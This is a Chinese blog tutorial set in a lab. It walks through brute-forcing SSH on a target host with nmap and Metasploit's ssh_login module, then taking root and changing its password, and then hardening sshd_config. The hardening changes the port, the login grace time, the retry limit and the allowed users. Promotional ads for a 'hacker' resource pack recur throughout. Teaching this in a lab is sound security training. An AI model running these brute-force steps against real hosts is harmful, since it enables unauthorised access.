网络安全零基础入门必看:Kali Linux如何进行SSH渗透与防御(非常详细)

最新推荐文章于 2025-09-13 14:18:33 发布
原创 最新推荐文章于 2025-09-13 14:18:33 发布 · 696 阅读 · 28 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #计算机 #网络安全 #黑客技术 #SSH渗透 #干货分享 #Kali Linux

文章目录

一、实验

1.环境

(1)主机

表1 主机

系统版本IP备注
Kali Linux2022.4

192.168.204.154(动态)

Ubuntu8.04192.168.204.143Kali(2022.4)的目标主机

(2)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(3) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(4)查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a


ip addr

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

2.nmap扫描目标主机

(1)扫描⽬标主机所在⽹段所有存活的主机

 nmap -sP 192.168.204.0/24

(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本

22端口已开放

nmap -sV 192.168.204.143

3.Kali Linux 进行 SSH 渗透

(1)进入MSF 控制台

msfconsole

(2) 搜索 ssh_login脚本

search ssh_login

(3) 使⽤编号为 0 的脚本

use 0

(4) 设置⽬标主机

 set rhosts 192.168.204.143

(4)查看选项

show options

(5)设置用户名与密码本

 set username msfadmin


set pass_file zidian.txt

(6)运⾏脚本

run

(7)查看会话

sessions

(8)连接会话

sessions 1

查看用户身份

whoami

查看路径

pwd

提升权限

 sudo -i

再次查看用户身份

whoami

更改密码

password root

(9)MobaXterm远程连接

连接

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

3.Kali Linux 进行 SSH 防御

(1)SSH安全配置(端口)

vim /etc/ssh/sshd_config

修改端口

(2)重启

/etc/init.d/ssh  restart

(3)退出之前的MSF

(5)进入MSF 控制台

msfconsole

(6) 搜索 ssh_login脚本

search ssh_login

(6) 使⽤编号为 0 的脚本

use 0

(7) 设置⽬标主机

 set rhosts 192.168.204.143

(8)设置用户名与密码本

 set username msfadmin


set pass_file zidian.txt

(9)运⾏脚本

失败

run

(10)nmap扫描端口

ssh端口为12345

nmap -sV 192.168.204.143

(11)查看选项

show options

(12) 设置目标端口

set rport 12345

(13)运⾏脚本

run


我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

(14)SSH安全配置(端口)

vim /etc/ssh/sshd_config

修改登录验证时间

(15)重启

/etc/init.d/ssh  restart

(16)验证(等待1分钟)

(17)SSH安全配置(容错次数)

vim /etc/ssh/sshd_config

修改容错次数

(18)重启

/etc/init.d/ssh  restart

(19)容错2次

二、问题

1.SSH有哪些安全配置

(1)配置

Port 12345            //端口                                  
LoginGraceTime 1m     //登录验证耗时                               
PermitRootLogin no    //不允许root远程登录                              
MaxAuthTries 2        //最大容错次数2                                
AllowUsers msfadmin@192.168.204.100    //允许指定用户在指定IP上登录

2.MSF 退出报错

(1)报错

[*] You have active sessions open, to exit anyway type "exit -y"

(2)原因分析

有session会话正在运行。

(3)解决方法

exit -y

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
Kali Linux2020 渗透测试指南》配套技术精讲
Ms08067安全实验室
11-10 1450
Kali是世界渗透测试行业公认的优秀的网络安全审计工具集合,它可以通过对设备的探测来审计它的安全性,而且功能极为完备,几乎包含了目前所有的热门工具。Kali的强大功能是毋庸置疑的,它几乎...
Kali Linux 安全渗透技术教程
09-06
Kali Linux 安全渗透技术教程-----Kali Linux 安全渗透技术教程----2017年7月出的
Kali Linux安全渗透教程全
07-07
偶然看到Kali Linux上架win10商店了,所以特意传上来给一些初学者学的
Kali Linux:从入门渗透测试的终极指南,一篇文章带你精通!
最新发布
2301_77472496的博客
09-13 998
Kali Linux 作为网络安全领域的「瑞士军刀」,集成 600 + 专业渗透工具,覆盖信息收集、漏洞利用、权限维持等全流程。本文结合最新实战场景,整理系统学习路径、核心工具解析及资源获取方式,助你快速掌握这门渗透测试备技能。尤其会重点介绍 2025 年 Kali Linux 的新特性,让你紧跟版本更新步伐。
KaliLinux安全渗透教程(完整版)
04-26
第 1 章 Lin u x 安 全 渗 透 简 介 1.1 什 么 是 安 全 渗 透 1.2 安 全 渗 透 所 需 的 工 具 1.3 K ali Lin u x 简 介 1.4 安 装 K ali Lin u x 1.5 K ali更 新 升 级 1.6 基 本 设 置 第 2 章 配 置 K ali Lin u x 2.1 准 备 内 核 头 文 件 2.2 安 装 并 配 置 N VIDIA 显 卡 驱 动 2.3 应 用 更 新 和 配 置 额 外 安 全 工 具 2.4 设 置 P r o x y C h ain s 2.5 目 录 加 密 第 3 章 高 级 测 试 实 验 室 3.1 使 用 V M w a r e W o r k s t a tio n 3.2 攻 击 W o r d P r e s s 和 其 他 应 用 程 序 第 4 章 信 息 收 集 4.1 枚 举 服 务 4.2 测 试 网 络 范 围 4.3 识 别 活 跃 的 主 机 4.4 查 看 打 开 的 端 口 4.5 系 统 指 纹 识 别 4.6 服 务 的 指 纹 识 别 4.7 其 他 信 息 收 集 手 段 4.8 使 用 M alt e g o 收 集 信 息 4.9 绘 制 网 络 结 构 图 第 5 章 漏 洞 扫 描 5.1 使 用 N e s s u s 5.2 使 用 O p e n VA S 第 6 章 漏 洞 利 用 6.1 M e t a s ploit a ble 操 作 系 统 6.2 M e t a s ploit 基 础 6.3 控 制 M e t e r p r e t e r 6.4 渗 透 攻 击 应 用 大 学 霸 K ali Lin u x 安 全 渗 透 教 程 2 6.5 7 7.1 7.2 7.3 7.4 8 8.1 8.2 8.3 8.4 8.5 8.6 8.7 8.8 8.9 9 9.1 9.2 9.3 9.4 9.5 9.6 9.7 9.8 6.5 免杀Payload生成工具Veil 第7章 权限提升 7.1 使用假冒令牌 7.2 本地权限提升 7.3 使用社会工程学工具包(SET) 7.4 使用SET实施攻击 第8章 密码攻击 8.1 密码在线破解 8.2 分析密码 8.3 破解LM Hashes密码 8.4 绕过Utilman登录 8.5 破解纯文本密码工具mimikatz 8.6 破解操作系统用户密码 8.7 创建密码字典 8.8 使用NVIDIA计算机统一设备架构(CUDA) 8.9 物理访问攻击 第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上破解无线网络 9.7 攻击路由器 9.8 Arpspoof工具
Kali Linux安全渗透教程(内部资料)
01-26
Kali Linux安全渗透教程(内部资料)
Kali Linux安全渗透教程新手版
12-06
Kali Linux安全渗透教程新手版,有利有新手的学习
Kali Linux在Android渗透测试中的应用】:权威指南揭秘从入门到高级的备技巧
Kali Linux在Android渗透测试中的基础知识 ## 1.1 Kali Linux简介 Kali Linux是一个基于Debian的Linux发行版,专为安全审计、渗透测试、计算机取证等信息安全领域设计。由于其预装了大量渗透测试工具和开源应用...
Kali Linux新手入门】:零基础打造黑客工具箱的10大秘诀
[【Kali Linux新手入门】:零基础打造黑客工具箱的10大秘诀](https://img-blog.csdnimg.cn/img_convert/1c94fc36f6831f91c07a5ba0d9645531.png) # 1. Kali Linux简介安装 ## 1.1 Kali Linux概述 Kali Linux是一...
linux ssh7.4 升级至9.5(安全扫描漏洞处理)
cc123489ll的博客
04-24 856
漏洞处理#$ ssh -V点击进行下载点击进行下载点击[telnet-server-0.17-66.el7.x86_64.rpm “telnet-server-0.17-66.el7.x86_64.rpm”)进行下载。
kali linux ssh
kali_linux的专栏
01-09 778
、修改sshd_config文件,命令为:vi /etc/ssh/sshd_config  2、将#PasswordAuthentication no的注释去掉,并且将NO修改为YES  //我的kali中默认是yes 3、将#PermitRootLogin yes的注释去掉 //我的kali中默认去掉了注释 4、启动SSH服务,命令为:/etc/init.d/ssh start // 或者
Kali Linux开启SSH
骑蜗牛散步的专栏
12-27 3873
Kali是基于Debian开发的,在启动见面里也可以明显的看到是Debian Kail,所以SSH开启方法跟Debian开启是一样的,公开源上资料很多 命令行下: service ssh start  或者 菜单 > kali linux > 系统服务 > SSH > sshd start   原则上是可以直接使用的 如果需要设置看 http://www.2cto.com/os/20
KaliLinux开启SSH
DF10f-0001A
10-31 330
将 PermitRootLogin without-password(第33行) 改为 PermitRootLogin yes 并去掉前面的注释符号(#)#PasswordAuthentication yes(第57行)的注释去掉,如果是no就改为yes保存后重启。
Kali Linux 开启 ssh
程序员野蛮成长
08-06 1239
Kali Linux通常默认已经安装了OpenSSH服务器,但首先确认一下总是好的。:默认的SSH配置对于大多数情况来说已经足够安全和适用,但你可能想要根据需要调整一些设置。:如果你使用了防火墙(如ufw),确保SSH端口(默认是22)是开放的。查找网络接口相关的IPv4地址(通常是eth0或wlan0,具体取决于你是通过有线还是无线连接网络)。:为了从另一台计算机连接到这台Kali机器,你需要知道它的IP地址。(表示已安装),则表明SSH服务器已经安装。:安装完成后,你需要启动SSH服务。
Kali-Linux之开启ssh服务,kali系统ssh服务开启
weixin_34862449的博客
05-08 2147
说明:新安装了个上kali玩玩,kail版本是kali-linux-2016.1-amd64。通过ssh远程时,却出现了些情况无法连接,特此记录下。具体:默认情况下kali并没有开启ssh服务1. 修改sshd_config文件,将#PasswordAuthentication no的注释去掉,并且将NO修改为YES# vi /etc/ssh/sshd_configPasswordAuthenti...
kali linux开启SSH连接
qyq88888的专栏
05-16 2553
kali linux
Kali Linux渗透测试技术详解_渗透测试入门
javagty6778的博客
03-12 1093
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟机,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。阅读永远是最有效的方法,尽管书籍并不一定是最好的入门方式,但书籍的理解需要一定的基础;
Kalikali 开启 SSH 服务
边扯边淡
12-17 1108
起序:虚拟机安装好 Kali 后,默认时不开启 SSH 服务的,需要手动修改配置文件打开。 一、修改内容 主要修改 /etc/ssh/sshd_config 配置文件。 # 需要 root 权限才能修改文件,前面需要加 sudo,如果本身就是 root,就不用加了 sudo vim /etc/ssh/sshd_config 1、PasswordAuthentication 这里我复制了一行 #PasswordAuthentication yes,然后去掉了 # 号,前后形成修改后的对比。 2、P
Kali Linux最新VM版:网络安全渗透测试利器
Kali Linux 是一款专为网络安全渗透测试设计的高级Linux发行版,由Offensive Security公司精心打造和持续维护。这个系统因其强大的攻防能力而在业界享有盛誉,是安全专业人士的首选工具,尤其适合进行安全评估和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值